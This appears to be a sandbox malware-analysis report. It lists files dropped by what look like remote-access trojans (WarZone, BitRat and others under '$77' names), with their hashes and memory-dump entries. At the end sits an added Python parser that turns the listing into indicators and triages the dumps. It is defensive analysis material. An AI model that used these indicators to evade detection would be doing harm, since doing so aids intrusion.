SHA512 c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

MD5 eb51a99599683b7b3d47981722da5218
SHA1 e693b669e2c309869ce31f13661ba6eb3d3b0566
SHA256 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38
SHA512 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.0.cs

MD5 b3a0e87506914a518a26de26cc397a0b
SHA1 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3
SHA256 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110
SHA512 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c

\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline

MD5 f4e02ad531227dfde2db9e6da710c2a2
SHA1 5d4e598721c989be975022060a01eef1992da72d
SHA256 6c4827996d73b0188f15ce978098ec336daab436babc02fcf1c1ff284fbe25a7
SHA512 2ee6a97c948b631919a7ea65641755563b5aea426d574f166c8e1e1d7e9b07e706f9bb9898749afd8f8b9f4fbc9d100fb690ebdc6f54bcbf1511ba5747138440

\??\c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP

MD5 8bbf0aca651a891e81c9323a8af372ee
SHA1 c6ff718e14da6eb73d2733b41c0a95df9a23fc45
SHA256 9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2
SHA512 e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp

MD5 bdb285fbac36bb8dbf9bae08e3ca29f9
SHA1 e9f9876f8e153eebef538ec82f62ed1cad2828c6
SHA256 bf18a49ec16c2340aa77dde24e050173bb15854c4dc04fa3fc2ce7ee3a30ed1a
SHA512 e56e0e1a23915a7e4f87b61f143bd66bc479078b7505bed9e8e25f27a3872c9ff6e7defd5ec9902f243194214c205c9a606b0f263c29066534efb90bf151b052

C:\ProgramData\$77images.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

MD5 1644f12dc1fdf3e3505fd85cc7ee2bfb
SHA1 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132
SHA256 a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7
SHA512 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39c9199f60a330471595859d6cdc0a6d
SHA1 eb9c797cb6f892c0a77b91ff6a6337f2ce958c24
SHA256 bae534da4c46d8a9137cd8aadddf9ce6a297edc7f7e05fe9cee777a4b6221411
SHA512 421ab0885d1b59e5705fc47912a90c546b01d7d5b5ab0b53195d5d854174e48524a73488ae80651d0b2350837f21a4070792dc1b6e4553beffa6203a931ace14

memory/4924-228-0x0000000007E40000-0x0000000007E62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70f94f425bc3f24106790d4c7d46b792
SHA1 e86ac9ab83476e200dc92c3be9d7b9a6792bce9b
SHA256 9bae3230b64b785583cc1dea8dd37e27fafa9c049d51192c2e7e02cbd417488c
SHA512 a0203cfc02e2a2bb9003b7f1be5e92c72d5dada4867f2209d311270541a78b0f2653e15a692ceb235d5d2846a3d5452c4dcb0e77ac7dafcc0ad1b6da3a9259ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6347b5bfbd2371b20a3c0452e4030638
SHA1 ada85fe3166c6d12a8cf4358d944637aeeaad4ee
SHA256 02250982f5f910704a7c1bea8cf81bda3194dfa8aefccba1c650a72288e64ec4
SHA512 b98b4b6e9e2e0848a09b7b24ecd9fb58febcb52d04ba62eccac4ad645466c5aa550b4691b2db8fb2749d7887f30ec5a35fc64c94172f6fb896fc55ca0e86368a

memory/1124-231-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-232-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-233-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-234-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-235-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

memory/1124-237-0x0000021DDEB50000-0x0000021DDEC50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cd207fca512b968e839518ad19ec724c
SHA1 4b8ce07ccbaf935f8c6378ef49bef65158cd99ec
SHA256 80cf8c8c54d4c4625614e3db5d9a0c66cacd15565aba698aec303ca7e1c0405d
SHA512 271af571ae4dd0a090213d38538bfd2749248395a99ed8a1ec598a488cda27988d2e84e2ab7514e3a905957e36cdad69d9a7f27e15864abb7a4cc98b21f28ba3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4b2ed10cbd2d58dbbf3c50a155c3e34d
SHA1 aabe7337b4253830afdf97f24a71773c7c236c6e
SHA256 5cb15d10fcd38f7f09e0a496169f451bf403d356cff9ac026a22691134ce8d4a
SHA512 bd99e9dc58099d290cf7b4ed9a54038e254087459ec302b85a9dac517c10670cc383952284210c20ef4daa182bc4d8a85fcb86cd744df5e85657f120a3bb589a

memory/3772-240-0x000000006E8D0000-0x000000006E909000-memory.dmp

memory/4092-241-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

memory/4092-242-0x0000017BC64C0000-0x0000017BC64E2000-memory.dmp

memory/3772-243-0x0000000070210000-0x0000000070249000-memory.dmp

memory/4092-244-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

memory/3772-245-0x0000000070210000-0x0000000070249000-memory.dmp

memory/4092-246-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp

memory/4092-247-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp

memory/2504-249-0x0000000140002300-mapping.dmp

memory/2504-248-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2504-251-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2504-252-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp

memory/2504-253-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp

memory/408-255-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

memory/620-254-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp
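The Files listing above is raw sandbox output: a dropped-file path followed by its MD5/SHA1/SHA256/SHA512, interleaved with `memory/<pid>-<index>-<start>-<end>-memory.dmp` and `memory/<pid>-<index>-<addr>-mapping.dmp` dump names. To turn it into IOCs and a memory-dump triage list you need it in structured form. The parser below is an added example, not part of this report or of the sandbox's own tooling; its sample input is a constructed subset copied from the entries above (one MSBuilds.exe drop, two writes of the same PowerShell profile path with different content, and the PID 2504 dump at 0x140000000). The default-image-base set and the system-DLL address floor used by `classify_region` are assumptions, marked as such in the code.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the report's Files listing above.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

MD5 1644f12dc1fdf3e3505fd85cc7ee2bfb
SHA1 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132
SHA256 a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7
SHA512 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be

memory/4668-198-0x0000000000C20000-0x0000000000C28000-memory.dmp

memory/4668-194-0x0000000000000000-mapping.dmp

memory/2504-248-0x0000000140000000-0x000000014002B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39c9199f60a330471595859d6cdc0a6d
SHA1 eb9c797cb6f892c0a77b91ff6a6337f2ce958c24
SHA256 bae534da4c46d8a9137cd8aadddf9ce6a297edc7f7e05fe9cee777a4b6221411
SHA512 421ab0885d1b59e5705fc47912a90c546b01d7d5b5ab0b53195d5d854174e48524a73488ae80651d0b2350837f21a4070792dc1b6e4553beffa6203a931ace14

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70f94f425bc3f24106790d4c7d46b792
SHA1 e86ac9ab83476e200dc92c3be9d7b9a6792bce9b
SHA256 9bae3230b64b785583cc1dea8dd37e27fafa9c049d51192c2e7e02cbd417488c
SHA512 a0203cfc02e2a2bb9003b7f1be5e92c72d5dada4867f2209d311270541a78b0f2653e15a692ceb235d5d2846a3d5452c4dcb0e77ac7dafcc0ad1b6da3a9259ee
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")
MEM_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+)-memory|-mapping)\.dmp$"
)
ORPHAN = "(path not in listing)"
# Assumptions: default MSVC linker image bases for x86 and x64, and the high
# user-mode range where ASLR'd system DLLs land on 64-bit Windows 10.
DEFAULT_IMAGE_BASES = {0x400000, 0x140000000}
SYSTEM_DLL_FLOOR = 0x7FF000000000


def parse_listing(text):
    """Return (files, regions, skipped). Digests are checked for hex and
    length; lines that match nothing are collected rather than dropped."""
    files, regions, skipped, current = [], [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line, "hashes": {}}
            files.append(current)
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"bad {algo} length: {line}")
            if current is None:  # hash block whose path was cut off above
                current = {"path": ORPHAN, "hashes": {}}
                files.append(current)
            current["hashes"][algo] = digest
            continue
        m = MEM_RE.match(line)
        if m:
            start = int(m.group("start"), 16)
            end = int(m.group("end"), 16) if m.group("end") else None
            regions.append({"pid": int(m.group("pid")), "index": int(m.group("idx")),
                            "start": start, "end": end,
                            "kind": "memory" if end is not None else "mapping"})
            continue
        skipped.append(line)
    return files, regions, skipped


def unique_sha256(files):
    """Map each distinct SHA256 to the paths it was seen under, so a path
    written several times (or one payload dropped twice) yields one IOC."""
    out = defaultdict(set)
    for f in files:
        if "SHA256" in f["hashes"]:
            out[f["hashes"]["SHA256"]].add(f["path"])
    return dict(out)


def region_size(r):
    return (r["end"] - r["start"]) if r["kind"] == "memory" else 0


def classify_region(r):
    """Coarse triage label: a dump at a default image base is the first
    candidate for carving an unpacked PE; high-range dumps are usually
    loaded system DLLs; everything else is private/heap memory."""
    if r["kind"] != "memory":
        return "mapping"
    if r["start"] in DEFAULT_IMAGE_BASES:
        return "default-image-base"
    if r["start"] >= SYSTEM_DLL_FLOOR:
        return "high-user-range"
    return "private"


def regions_by_pid(regions):
    """Group memory dumps per PID, largest first, with a triage label."""
    by = defaultdict(list)
    for r in regions:
        if r["kind"] == "memory":
            by[r["pid"]].append((r["start"], r["end"], region_size(r), classify_region(r)))
    return {pid: sorted(v, key=lambda t: -t[2]) for pid, v in by.items()}


if __name__ == "__main__":
    files, regions, skipped = parse_listing(SAMPLE)
    for sha, paths in unique_sha256(files).items():
        print(sha, sorted(paths))
    for pid, regs in regions_by_pid(regions).items():
        for start, end, size, label in regs:
            print(f"pid {pid}: {start:#x}-{end:#x} ({size} bytes) {label}")
```

On the sample this yields three distinct SHA256 values (the profile path is listed twice because PowerShell rewrote it with different content) and flags the 0x2B000-byte dump at 0x140000000 in PID 2504 as sitting at the default x64 image base, which is where an analyst would start when looking for the unpacked payload. Treat the address heuristics as hints only; the address-space layout of the sandbox VM is not stated in the report.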